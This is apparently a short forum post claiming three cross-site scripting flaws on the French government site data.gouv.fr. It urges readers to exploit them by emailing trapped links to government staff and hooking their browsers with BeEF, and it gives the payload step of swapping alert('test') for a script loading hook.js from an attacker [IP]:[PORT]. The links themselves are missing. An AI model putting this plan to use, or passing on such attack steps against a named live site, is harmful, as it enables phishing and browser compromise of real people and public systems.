"DATA.GOUV.FR" XSS VULNERABILITY x3

Hello everyone, some time ago I found 3 XSS vulnerability on the data.gouv.fr website (a French government site) for me it is not useful because not enough skill about XSS Vulnerability and Social-Engineering

The 3 XSS vulnerability can very well be used with "BeEF" and sent a link trapped by email to the government and exploit the browser of french governement


Replace alert("test") with your malicious script. (ex for BeEF. src=http://[IP]:[PORT]/hook.js)


Link: